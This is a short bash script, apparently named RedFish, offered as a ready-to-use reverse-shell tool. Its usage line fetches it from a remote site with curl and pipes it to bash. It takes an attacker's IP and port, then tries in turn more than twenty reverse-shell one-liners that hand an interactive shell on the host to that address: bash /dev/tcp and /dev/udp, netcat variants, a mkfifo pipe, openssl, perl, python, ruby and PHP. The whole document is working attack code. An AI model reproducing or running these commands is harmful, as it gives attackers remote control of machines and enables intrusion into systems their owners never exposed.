#!/bin/bash
# RedFish — reverse shell one-liner (raw)
# Chaque echec passe a la commande suivante (||) ; le premier shell qui
# fonctionne stoppe tout. Perl/PHP (code 0 meme en echec) are in last.
# Usage :
#   curl -sL axolol.fr/r | bash -s <ip>[:<port>]   (port par défaut : 4444)
A=${1:-127.0.0.1}
I=${A%%:*} P=${A##*:}
[ "$I" = "$P" ] && P=4444
(bash -i >& /dev/tcp/"$I"/"$P" 0>&1) || (0<&196;exec 196<>/dev/tcp/"$I"/"$P"; bash <&196 >&196 2>&196) || (exec 5<>/dev/tcp/"$I"/"$P";cat <&5 | while read line; do $line 2>&5 >&5; done) || (bash -i 5<> /dev/tcp/"$I"/"$P" 0<&5 1>&5 2>&5) || (bash -i >& /dev/udp/"$I"/"$P" 0>&1) || (rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc "$I" "$P" >/tmp/f) || (nc -e bash "$I" "$P") || (nc -c bash "$I" "$P") || (busybox nc "$I" "$P" -e bash) || (ncat "$I" "$P" -e bash) || (perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"'"$I"':'"$P"'");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;') || (python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'"$I"'",'"$P"'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);') || (python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'"$I"'",'"$P"'));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")') || (ruby -rsocket -e'f=TCPSocket.new("'"$I"'",'"$P"');exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)') || (mkfifo /tmp/s; bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect "$I":"$P" > /tmp/s; rm /tmp/s) || (perl -e 'use Socket;$i="'"$I"'";$p='"$P"';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');exec("/bin/sh -i <&3 >&3 2>&3", $pipes);') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');shell_exec("/bin/bash <&3 >&3 2>&3");') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');system("/bin/bash <&3 >&3 2>&3");') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');passthru("/bin/bash <&3 >&3 2>&3");') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');`/bin/bash <&3 >&3 2>&3`;') || (php -r '$sock=fsockopen("'"$I"'",'"$P"');$proc=proc_open("/bin/bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);')
